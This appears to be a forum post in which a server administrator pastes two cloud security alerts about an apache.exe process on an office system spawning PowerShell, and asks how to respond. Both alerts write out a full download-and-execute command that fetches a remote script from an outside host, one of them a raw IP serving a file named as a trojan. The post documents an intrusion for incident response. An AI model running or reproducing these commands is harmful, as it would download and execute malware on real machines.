好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 lovesshao 于 2020-7-16 16:51 编辑
最近服务器消息提示:进程异常行为-访问恶意下载源,如图该如何解决
[url=]备注[/url]处理
该告警由如下引擎检测发现:[color=rgb(99, 186, 77) !important][color=rgb(99, 186, 77) !important][color=rgb(99, 186, 77) !important][color=rgb(99, 186, 77) !important]
父进程路径:D:/MYOA/bin/apache.exe
父进程命令行:D:\MYOA\bin\apache.exe -d D:/MYOA
父进程id:1416
进程ID:5644
URL链接:https://www.naosbio.com/images/main/js/ax.txt
进程路径:C:/Windows/SysWOW64/cmd.exe
命令行参数:cmd /c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('https://www.naosbio.com/images/main/js/ax.txt')
与该URL有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
进程异常行为-访问恶意下载源待处理 高级威胁检测模型 [url=]备注[/url]处理
该告警由如下引擎检测发现:[color=rgb(99, 186, 77) !important][color=rgb(99, 186, 77) !important][color=rgb(99, 186, 77) !important][color=rgb(99, 186, 77) !important]
父进程路径:D:/MYOA/bin/apache.exe
父进程命令行:D:\MYOA\bin\apache.exe -d D:/MYOA
父进程id:2176
进程ID:7688
URL链接:http://13.115.195.195:801/muma.ps1
进程路径:C:/Windows/SysWOW64/cmd.exe
命令行参数:cmd /c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('http://13.115.195.195:801/muma.ps1')
与该URL有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。 |
-
-
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
发表于 2020-7-16 16:49
|
发表于 2020-7-16 17:16
